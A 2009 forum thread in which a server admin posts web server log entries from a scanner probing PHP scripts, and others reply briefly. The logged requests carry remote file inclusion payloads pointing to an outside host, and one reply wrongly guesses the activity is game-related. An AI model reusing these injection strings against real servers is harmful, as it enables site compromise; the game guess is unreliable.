| Forum Home | ||||
| Press F1 | ||||
| Thread ID: 97580 | 2009-02-20 20:40:00 | Strange server logs | somebody (208) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 749731 | 2009-02-20 20:40:00 | Does anyone have any ideas as to what this might be (I have censored out some IP addresses and hostnames)? My suspicion is that it's a bot trying to find vulnerable software installs. Thoughts? 2009-02-19 22:25:37 W3SVC18 MYSERVER 69.9.xxx.xxx GET /business_inc/saveserver.php thisdir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 225 93 2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /includes/db_adodb.php baseDir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 219 93 2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /includes/include_once.php include_file=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 228 93 2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /cacti/include/config_settings.php config[include_path]=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 244 93 2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /admin/business_inc/saveserver.php thisdir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 231 109 2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /calendar/ws/get_events.php includedir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 228 78 2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /dotProject/modules/admin/vw_usr_roles.php baseDir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 239 109 2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /index.php id=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 202 93 2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /poll/booth.php include_path=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 217 93 2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /modules/errors.php error=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 214 93 |
somebody (208) | ||
| 749732 | 2009-02-20 20:51:00 | ekle.us | pctek (84) | ||
| 749733 | 2009-02-20 20:53:00 | a quick google on "Morfeus+" indicates a game, my guess someone is trying to play online games wrong pctek i think is on to it here (ekle.us) |
beama (111) | ||
| 749734 | 2009-02-20 20:59:00 | pf1 censor is messing with the links but im sure you can fill in the ********* | beama (111) | ||
| 749735 | 2009-02-20 22:44:00 | Thanks guys | somebody (208) | ||
| 1 | |||||